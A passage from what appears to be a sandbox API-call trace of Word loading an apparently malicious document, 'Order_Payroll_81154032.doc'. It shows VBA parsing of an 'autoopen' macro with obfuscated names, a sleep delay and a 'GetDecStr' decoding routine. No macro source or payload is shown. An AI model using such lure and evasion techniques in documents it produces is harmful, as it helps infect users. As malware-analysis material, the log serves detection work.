cchSrc=1, lpCharType=0x2060a0 | out: lpCharType=0x2060a0) returned 1 [0044.977] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xc4", cchSrc=1, lpCharType=0x2060a0 | out: lpCharType=0x2060a0) returned 1 [0044.977] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xc5", cchSrc=1, lpCharType=0x2060a0 | out: lpCharType=0x2060a0) returned 1 [0044.977] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xc6", cchSrc=1, lpCharType=0x2060a0 | out: lpCharType=0x2060a0) returned 1 [0044.977] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xc7", cchSrc=1, lpCharType=0x2060a0 | out: lpCharType=0x2060a0) returned 1 [0044.977] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xc8", cchSrc=1, lpCharType=0x2060a0 | out: lpCharType=0x2060a0) returned 1 [0044.977] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xc9", cchSrc=1, lpCharType=0x2060a0 | out: lpCharType=0x2060a0) returned 1 [0044.977] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xca", cchSrc=1, lpCharType=0x2060a0 | out: lpCharType=0x2060a0) returned 1 [0044.977] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xcb", cchSrc=1, lpCharType=0x2060a0 | out: lpCharType=0x2060a0) returned 1 [0044.978] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xcc", cchSrc=1, lpCharType=0x2060a0 | out: lpCharType=0x2060a0) returned 1 [0044.978] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xcd", cchSrc=1, lpCharType=0x2060a0 | out: lpCharType=0x2060a0) returned 1 [0044.978] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xce", cchSrc=1, lpCharType=0x2060a0 | out: lpCharType=0x2060a0) returned 1 [0044.978] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xcf", cchSrc=1, lpCharType=0x2060a0 | out: lpCharType=0x2060a0) returned 1 [0044.978] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xd0", cchSrc=1, lpCharType=0x2060a0 | out: lpCharType=0x2060a0) returned 1 [0044.978] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xd1", cchSrc=1, lpCharType=0x2060a0 | out: lpCharType=0x2060a0) returned 1 [0044.978] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xd2", cchSrc=1, lpCharType=0x2060a0 | out: lpCharType=0x2060a0) returned 1 [0044.978] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xd3", cchSrc=1, lpCharType=0x2060a0 | out: lpCharType=0x2060a0) returned 1 [0044.978] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xd4", cchSrc=1, lpCharType=0x2060a0 | out: lpCharType=0x2060a0) returned 1 [0044.978] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xd5", cchSrc=1, lpCharType=0x2060a0 | out: lpCharType=0x2060a0) returned 1 [0044.978] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xd6", cchSrc=1, lpCharType=0x2060a0 | out: lpCharType=0x2060a0) returned 1 [0044.978] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xd7", cchSrc=1, lpCharType=0x2060a0 | out: lpCharType=0x2060a0) returned 1 [0044.978] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xd8", cchSrc=1, lpCharType=0x2060a0 | out: lpCharType=0x2060a0) returned 1 [0044.978] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xd9", cchSrc=1, lpCharType=0x2060a0 | out: lpCharType=0x2060a0) returned 1 [0044.978] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xda", cchSrc=1, lpCharType=0x2060a0 | out: lpCharType=0x2060a0) returned 1 [0044.978] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xdb", cchSrc=1, lpCharType=0x2060a0 | out: lpCharType=0x2060a0) returned 1 [0044.978] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xdc", cchSrc=1, lpCharType=0x2060a0 | out: lpCharType=0x2060a0) returned 1 [0044.978] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xdd", cchSrc=1, lpCharType=0x2060a0 | out: lpCharType=0x2060a0) returned 1 [0044.978] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xde", cchSrc=1, lpCharType=0x2060a0 | out: lpCharType=0x2060a0) returned 1 [0044.978] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xdf", cchSrc=1, lpCharType=0x2060a0 | out: lpCharType=0x2060a0) returned 1 [0044.978] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xe0", cchSrc=1, lpCharType=0x2060a0 | out: lpCharType=0x2060a0) returned 1 [0044.978] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xe1", cchSrc=1, lpCharType=0x2060a0 | out: lpCharType=0x2060a0) returned 1 [0044.978] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xe2", cchSrc=1, lpCharType=0x2060a0 | out: lpCharType=0x2060a0) returned 1 [0044.978] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xe3", cchSrc=1, lpCharType=0x2060a0 | out: lpCharType=0x2060a0) returned 1 [0044.978] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xe4", cchSrc=1, lpCharType=0x2060a0 | out: lpCharType=0x2060a0) returned 1 [0044.978] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xe5", cchSrc=1, lpCharType=0x2060a0 | out: lpCharType=0x2060a0) returned 1 [0044.978] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xe6", cchSrc=1, lpCharType=0x2060a0 | out: lpCharType=0x2060a0) returned 1 [0044.978] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xe7", cchSrc=1, lpCharType=0x2060a0 | out: lpCharType=0x2060a0) returned 1 [0044.978] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xe8", cchSrc=1, lpCharType=0x2060a0 | out: lpCharType=0x2060a0) returned 1 [0044.978] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xe9", cchSrc=1, lpCharType=0x2060a0 | out: lpCharType=0x2060a0) returned 1 [0044.978] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xea", cchSrc=1, lpCharType=0x2060a0 | out: lpCharType=0x2060a0) returned 1 [0044.978] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xeb", cchSrc=1, lpCharType=0x2060a0 | out: lpCharType=0x2060a0) returned 1 [0044.978] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xec", cchSrc=1, lpCharType=0x2060a0 | out: lpCharType=0x2060a0) returned 1 [0044.979] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xed", cchSrc=1, lpCharType=0x2060a0 | out: lpCharType=0x2060a0) returned 1 [0044.979] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xee", cchSrc=1, lpCharType=0x2060a0 | out: lpCharType=0x2060a0) returned 1 [0044.979] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xef", cchSrc=1, lpCharType=0x2060a0 | out: lpCharType=0x2060a0) returned 1 [0044.979] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xf0", cchSrc=1, lpCharType=0x2060a0 | out: lpCharType=0x2060a0) returned 1 [0044.979] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xf1", cchSrc=1, lpCharType=0x2060a0 | out: lpCharType=0x2060a0) returned 1 [0044.979] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xf2", cchSrc=1, lpCharType=0x2060a0 | out: lpCharType=0x2060a0) returned 1 [0044.979] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xf3", cchSrc=1, lpCharType=0x2060a0 | out: lpCharType=0x2060a0) returned 1 [0044.979] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xf4", cchSrc=1, lpCharType=0x2060a0 | out: lpCharType=0x2060a0) returned 1 [0044.979] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xf5", cchSrc=1, lpCharType=0x2060a0 | out: lpCharType=0x2060a0) returned 1 [0044.979] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xf6", cchSrc=1, lpCharType=0x2060a0 | out: lpCharType=0x2060a0) returned 1 [0044.979] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xf7", cchSrc=1, lpCharType=0x2060a0 | out: lpCharType=0x2060a0) returned 1 [0044.979] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xf8", cchSrc=1, lpCharType=0x2060a0 | out: lpCharType=0x2060a0) returned 1 [0044.979] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xf9", cchSrc=1, lpCharType=0x2060a0 | out: lpCharType=0x2060a0) returned 1 [0044.979] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xfa", cchSrc=1, lpCharType=0x2060a0 | out: lpCharType=0x2060a0) returned 1 [0044.979] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xfb", cchSrc=1, lpCharType=0x2060a0 | out: lpCharType=0x2060a0) returned 1 [0044.979] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xfc", cchSrc=1, lpCharType=0x2060a0 | out: lpCharType=0x2060a0) returned 1 [0044.979] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xfd", cchSrc=1, lpCharType=0x2060a0 | out: lpCharType=0x2060a0) returned 1 [0044.979] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xfe", cchSrc=1, lpCharType=0x2060a0 | out: lpCharType=0x2060a0) returned 1 [0044.979] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xff", cchSrc=1, lpCharType=0x2060a0 | out: lpCharType=0x2060a0) returned 1 [0044.979] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Attribute") returned 0x10ed01 [0044.979] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Name") returned 0x10e2ff [0044.979] IMalloc:Alloc (This=0x7feff045380, cb=0x5) returned 0x8188260 [0044.979] IMalloc:Alloc (This=0x7feff045380, cb=0xa) returned 0x8005430 [0044.979] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x8188260, cbMultiByte=5, lpWideCharStr=0x8005430, cchWideChar=5 | out: lpWideCharStr="Loi1") returned 5 [0044.979] IMalloc:Free (This=0x7feff045380, pv=0x8188260) [0044.979] IMalloc:Free (This=0x7feff045380, pv=0x8005430) [0044.980] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Attribute") returned 0x10ed01 [0044.980] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Base") returned 0x109fb8 [0044.980] IMalloc:Alloc (This=0x7feff045380, cb=0x15) returned 0x8005430 [0044.980] IMalloc:Alloc (This=0x7feff045380, cb=0x2a) returned 0x7d55450 [0044.980] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x8005430, cbMultiByte=21, lpWideCharStr=0x7d55450, cchWideChar=21 | out: lpWideCharStr="1Normal.ThisDocument") returned 21 [0044.980] IMalloc:Alloc (This=0x7feff045380, cb=0x2a) returned 0x7d55490 [0045.066] IMalloc:Realloc (This=0x7feff045380, pv=0x8075240, cb=0x20) returned 0x7dff780 [0045.066] IMalloc:Realloc (This=0x7feff045380, pv=0x80753d0, cb=0x28) returned 0x7dff240 [0045.066] IMalloc:Free (This=0x7feff045380, pv=0x8005430) [0045.066] IMalloc:Free (This=0x7feff045380, pv=0x7d55450) [0045.066] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Attribute") returned 0x10ed01 [0045.066] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_GlobalNameSpace") returned 0x10ce77 [0045.066] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="False") returned 0x102d01 [0045.066] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Attribute") returned 0x10ed01 [0045.066] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Creatable") returned 0x101d92 [0045.067] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="False") returned 0x102d01 [0045.067] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Attribute") returned 0x10ed01 [0045.067] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_PredeclaredId") returned 0x105fc7 [0045.067] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="True") returned 0x10f0f4 [0045.067] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Attribute") returned 0x10ed01 [0045.067] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Exposed") returned 0x1030b3 [0045.067] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="True") returned 0x10f0f4 [0045.067] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Attribute") returned 0x10ed01 [0045.067] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_TemplateDerived") returned 0x109f1e [0045.067] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="True") returned 0x10f0f4 [0045.068] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Attribute") returned 0x10ed01 [0045.068] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Customizable") returned 0x10c26d [0045.068] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="True") returned 0x10f0f4 [0045.068] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sub") returned 0x10d5ac [0045.068] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="autoopen") returned 0x102ad9 [0045.068] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x30d2b32, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0045.068] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x30d2b32, cbMultiByte=8, lpWideCharStr=0x27651d8, cchWideChar=8 | out: lpWideCharStr="autoopen") returned 8 [0045.068] IMalloc:Realloc (This=0x7feff045380, pv=0x0, cb=0x30) returned 0x7d55450 [0045.068] VirtualAlloc (lpAddress=0x0, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x3340000 [0045.069] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Dim") returned 0x1083c4 [0045.069] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="slsume") returned 0x1086a0 [0045.069] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="As") returned 0x105c8d [0045.069] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="String") returned 0x10102a [0045.070] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="slsume") returned 0x1086a0 [0045.070] strcpy_s (in: _Dst=0x7fee406efc0, _DstSize=0x100, _Src="slsume" | out: _Dst="slsume") returned 0x0 [0045.070] IMalloc:Realloc (This=0x7feff045380, pv=0x0, cb=0x30) returned 0x7d554d0 [0045.070] VirtualAlloc (lpAddress=0x0, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x33d0000 [0045.071] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Duren") returned 0x1098d2 [0045.073] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0045.073] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sub") returned 0x10d5ac [0045.073] CExposedStream::Read () returned 0x0 [0045.073] IMalloc:Realloc (This=0x7feff045380, pv=0x81e9fa0, cb=0x2c4) returned 0x81e9fa0 [0045.073] CExposedStream::Release () returned 0x1 [0045.073] CExposedStream::Release () returned 0x0 [0045.074] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HHlau", cchWideChar=6, lpMultiByteStr=0x206290, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HHlau", lpUsedDefaultChar=0x0) returned 6 [0045.074] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="HHlau") returned 0x10b622 [0045.074] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HHlau", cchWideChar=6, lpMultiByteStr=0x2063d0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HHlau", lpUsedDefaultChar=0x0) returned 6 [0045.074] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="HHlau") returned 0x10b622 [0045.074] IMalloc:Realloc (This=0x7feff045380, pv=0x8188240, cb=0x10) returned 0x8005430 [0045.074] IMalloc:Alloc (This=0x7feff045380, cb=0x80) returned 0x811bea0 [0045.074] IMalloc:GetSize (This=0x7feff045380, pv=0x811bea0) returned 0x80 [0045.074] IMalloc:Alloc (This=0x7feff045380, cb=0xb8) returned 0x26ff010 [0045.074] IMalloc:Alloc (This=0x7feff045380, cb=0xb8) returned 0x26ff0d0 [0045.074] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HHlau", cchWideChar=6, lpMultiByteStr=0x206290, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HHlau", lpUsedDefaultChar=0x0) returned 6 [0045.074] CoCreateGuid (in: pguid=0x205fc0 | out: pguid=0x205fc0*(Data1=0xd4d93dea, Data2=0x7ddb, Data3=0x4c35, Data4=([0]=0xb7, [1]=0xb, [2]=0x75, [3]=0x48, [4]=0xbc, [5]=0x12, [6]=0x67, [7]=0x65))) returned 0x0 [0045.074] CoCreateGuid (in: pguid=0x205fd0 | out: pguid=0x205fd0*(Data1=0x6f14cbc7, Data2=0xa0d7, Data3=0x450b, Data4=([0]=0xb6, [1]=0x3d, [2]=0x85, [3]=0x44, [4]=0x94, [5]=0xc8, [6]=0x86, [7]=0x1d))) returned 0x0 [0045.074] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="HHlau", cchWideChar=6, lpMultiByteStr=0x205fe0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HHlau", lpUsedDefaultChar=0x0) returned 6 [0045.074] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="HHlau") returned 0x10b622 [0045.074] GetLocalTime (in: lpSystemTime=0x205eb8 | out: lpSystemTime=0x205eb8*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x3, wDay=0x6, wHour=0x10, wMinute=0x29, wSecond=0xa, wMilliseconds=0x34e)) [0045.074] _ultow_s (in: _Value=0x5e399ea6, _Buffer=0x81d7594, _BufferCount=0x9, _Radix=16 | out: _Buffer="5e399ea6") returned 0x0 [0045.074] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="025e399ea6", cchWideChar=11, lpMultiByteStr=0x205e50, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="025e399ea6", lpUsedDefaultChar=0x0) returned 11 [0045.074] strcpy_s (in: _Dst=0x7fd4c58, _DstSize=0x6, _Src="HHlau" | out: _Dst="HHlau") returned 0x0 [0045.074] IMalloc:Realloc (This=0x7feff045380, pv=0x8070120, cb=0xd0) returned 0x81163a0 [0045.074] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="HHlau") returned 0x10b622 [0045.074] wcscpy_s (in: _Destination=0x81d7670, _SizeInWords=0x6, _Source="HHlau" | out: _Destination="HHlau") returned 0x0 [0045.074] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="HHlau") returned 0x10b622 [0045.074] wcscpy_s (in: _Destination=0x81d7680, _SizeInWords=0x6, _Source="HHlau" | out: _Destination="HHlau") returned 0x0 [0045.074] IMalloc:Realloc (This=0x7feff045380, pv=0x80051b0, cb=0x24) returned 0x7dff210 [0045.074] IMalloc:Realloc (This=0x7feff045380, pv=0x8075300, cb=0xc) returned 0x80051b0 [0045.075] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="HHlau") returned 0x10b622 [0045.075] IMalloc:Alloc (This=0x7feff045380, cb=0x54) returned 0x7f18070 [0045.075] IMalloc:Free (This=0x7feff045380, pv=0x810feb0) [0045.075] IMalloc:Alloc (This=0x7feff045380, cb=0x20) returned 0x7dff1b0 [0045.075] IMalloc:Realloc (This=0x7feff045380, pv=0x7dff1b0, cb=0x80) returned 0x811bf30 [0045.075] IMalloc:Free (This=0x7feff045380, pv=0x7f18070) [0045.075] IMalloc:Alloc (This=0x7feff045380, cb=0x3d0) returned 0x81ea280 [0045.075] IMalloc:Alloc (This=0x7feff045380, cb=0x20) returned 0x7dff1b0 [0045.075] IMalloc:Alloc (This=0x7feff045380, cb=0x10) returned 0x80054b0 [0045.075] IMalloc:Alloc (This=0x7feff045380, cb=0x80) returned 0x811bfc0 [0045.075] IMalloc:Alloc (This=0x7feff045380, cb=0x0) returned 0x8075300 [0045.075] IMalloc:Alloc (This=0x7feff045380, cb=0x0) returned 0x80753d0 [0045.075] wcsncpy_s (in: _Destination=0x205fa0, _SizeInWords=0x108, _Source="*\\CC:\\Users\\aETAdzjz\\Desktop\\Order_Payroll_81154032.doc", _MaxCount=0x106 | out: _Destination="*\\CC:\\Users\\aETAdzjz\\Desktop\\Order_Payroll_81154032.doc") returned 0x0 [0045.075] CharLowerBuffW (in: lpsz="*\\CC:\\Users\\aETAdzjz\\Desktop\\Order_Payroll_81154032.doc", cchLength=0x37 | out: lpsz="*\\cc:\\users\\aetadzjz\\desktop\\order_payroll_81154032.doc") returned 0x37 [0045.075] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\cc:\\users\\aetadzjz\\desktop\\order_payroll_81154032.doc", cchWideChar=56, lpMultiByteStr=0x205ed0, cbMultiByte=112, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\cc:\\users\\aetadzjz\\desktop\\order_payroll_81154032.doc", lpUsedDefaultChar=0x0) returned 56 [0045.075] _wcsicmp (_String1="*\\CC:\\Users\\aETAdzjz\\Desktop\\Order_Payroll_81154032.doc", _String2="*\\CC:\\Users\\aETAdzjz\\Desktop\\Order_Payroll_81154032.doc") returned 0 [0045.075] CExposedDocFile::AddRef () returned 0x4 [0045.075] CExposedDocFile::AddRef () returned 0x5 [0045.075] CExposedDocFile::OpenStream () returned 0x0 [0045.075] CExposedDocFile::Release () returned 0x4 [0045.075] CExposedStream::Seek () returned 0x0 [0045.075] IMalloc:Alloc (This=0x7feff045380, cb=0x688) returned 0x81ea690 [0045.076] IMalloc:Alloc (This=0x7feff045380, cb=0x80) returned 0x811c050 [0045.076] IMalloc:Alloc (This=0x7feff045380, cb=0x640) returned 0x81f2660 [0045.076] IMalloc:Alloc (This=0x7feff045380, cb=0x20) returned 0x7dff180 [0045.076] IMalloc:Alloc (This=0x7feff045380, cb=0x0) returned 0x8075240 [0045.076] IMalloc:Alloc (This=0x7feff045380, cb=0x0) returned 0x8188240 [0045.076] IMalloc:Alloc (This=0x7feff045380, cb=0x20) returned 0x7dff150 [0045.076] IMalloc:Alloc (This=0x7feff045380, cb=0x80) returned 0x811c0e0 [0045.076] CExposedStream::AddRef () returned 0x2 [0045.076] CExposedStream::Read () returned 0x0 [0045.076] CExposedStream::AddRef () returned 0x3 [0045.076] CExposedStream::Release () returned 0x2 [0045.076] IMalloc:Alloc (This=0x7feff045380, cb=0x2ee0) returned 0x81f2cb0 [0045.076] CExposedStream::Read () returned 0x0 [0045.076] CExposedStream::Read () returned 0x0 [0045.076] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_Evaluate") returned 0x10d918 [0045.076] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Attribute") returned 0x10ed01 [0045.076] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Name") returned 0x10e2ff [0045.076] IMalloc:Alloc (This=0x7feff045380, cb=0x6) returned 0x8188260 [0045.076] IMalloc:Alloc (This=0x7feff045380, cb=0xc) returned 0x8005530 [0045.076] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x8188260, cbMultiByte=6, lpWideCharStr=0x8005530, cchWideChar=6 | out: lpWideCharStr="HHlau") returned 6 [0045.076] IMalloc:Free (This=0x7feff045380, pv=0x8188260) [0045.076] IMalloc:Free (This=0x7feff045380, pv=0x8005530) [0045.077] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Dim") returned 0x1083c4 [0045.077] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="lore") returned 0x10b30c [0045.077] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="As") returned 0x105c8d [0045.077] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Bookmarks") returned 0x106e3f [0045.077] IMalloc:Realloc (This=0x7feff045380, pv=0x8075300, cb=0x20) returned 0x7dff120 [0045.077] IMalloc:Realloc (This=0x7feff045380, pv=0x8075240, cb=0x28) returned 0x7dff0f0 [0045.077] IMalloc:Realloc (This=0x7feff045380, pv=0x811c050, cb=0x260) returned 0x81a9ac0 [0045.077] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sub") returned 0x10d5ac [0045.077] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Rhoi") returned 0x102f25 [0045.077] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x30d2c2a, cbMultiByte=4, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 4 [0045.077] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x30d2c2a, cbMultiByte=4, lpWideCharStr=0x27651d8, cchWideChar=4 | out: lpWideCharStr="Rhoi") returned 4 [0045.077] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="sleep") returned 0x10ed0e [0045.077] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee406eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0045.077] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee406eba0, cbMultiByte=-1, lpWideCharStr=0x27651d8, cchWideChar=6 | out: lpWideCharStr="14563") returned 6 [0045.077] VarI4FromStr (in: strIn="14563", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee406ea10 | out: plOut=0x7fee406ea10) returned 0x0 [0045.077] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Rhoi") returned 0x102f25 [0045.077] strcpy_s (in: _Dst=0x7fee406efc0, _DstSize=0x100, _Src="Rhoi" | out: _Dst="Rhoi") returned 0x0 [0045.077] atoi (_Str="128") returned 128 [0045.078] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="MsgBox") returned 0x105297 [0045.078] IMalloc:Realloc (This=0x7feff045380, pv=0x81a9ac0, cb=0x4c0) returned 0x7fdb8d0 [0045.078] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0045.078] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sub") returned 0x10d5ac [0045.078] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sub") returned 0x10d5ac [0045.078] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="GetDecStr") returned 0x106511 [0045.078] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x30d2ca2, cbMultiByte=9, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 9 [0045.078] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x30d2ca2, cbMultiByte=9, lpWideCharStr=0x27651d8, cchWideChar=9 | out: lpWideCharStr="GetDecStr") returned 9 [0045.078] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ET") returned 0x105d22 [0045.078] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="As") returned 0x105c8d [0045.078] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="String") returned 0x10102a [0045.078] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ByRef") returned 0x1074ef [0045.079] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CS") returned 0x105cd7 [0045.079] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="As") returned 0x105c8d [0045.079] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="String") returned 0x10102a [0045.079] IMalloc:Realloc (This=0x7feff045380, 